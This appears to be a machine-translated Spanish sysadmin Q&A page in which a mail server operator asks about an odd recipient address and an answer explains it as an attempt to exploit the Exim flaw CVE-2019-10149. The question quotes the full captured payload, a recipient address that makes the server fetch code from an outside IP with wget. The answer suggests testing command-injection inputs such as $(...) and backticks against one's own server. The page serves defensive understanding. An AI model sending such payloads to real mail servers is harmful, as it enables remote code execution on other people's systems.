3 votos

ataque a través de línea ejecutable después de iniciar sesión en la dirección de correo electrónico

Yo manejo mi propio servidor de correo, y de vez en cuando, la gente enviar spam o misteriosas cosas a la cuenta de root. Recientemente, recibí un vacío de correo, la cual fue dirigida a:

root+${ejecutar{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@midominio.tld

La segunda dirección IP en la que la cadena parece estar poseído por el mismo servicio de hosting que puedo alquilar mi servidor. La ejecución y wget aspecto muy sospechoso para mí, pero no he encontrado nada acerca de este tipo de ataque en el Internet.

De acuerdo con el servidor de correo del registro, que el correo fue enviado desde 148.72.206.111. Sin embargo, El De campo a root@sab.com.

¿Alguien sabe, ¿qué significa esto?

3voto

Nick Dixon Puntos 154

Este es un intento de explotar un recientemente descubierto error en el Exim4 servidor SMTP (v4.87 a v4.91), que podría permitir la ejecución remota de comandos como Exim ampliaría ${variable} sustituciones en ciertos lugares que realmente no era. (Esta sintaxis se utiliza ampliamente en el principal archivo de configuración de Exim.)

El error es conocido como CVE-2019-10149 (no tiene un nombre de marca registrada o el logotipo todavía). Si se utiliza Exim4 de su distribución, que ya se han recibido los parches. Ya que usted está utilizando Postfix, no le afecta en primer lugar.

(Dicho esto, incluso en Postfix el parámetro después de la + se utiliza con frecuencia como parte de una línea de comandos, por ejemplo, cuando la invocación de Procmail. Probablemente yo recomiendo hacer un par de pruebas en contra de su propio servidor para ver cómo maneja las cosas como someuser+$(blah)@ o someuser+`blah`@.)

EnMiMaquinaFunciona.com

EnMiMaquinaFunciona es una comunidad de administradores de sistemas en la que puedes resolver tus problemas y dudas.
Puedes consultar las preguntas de otros sysadmin, hacer tus propias preguntas o resolver las de los demás.

Powered by: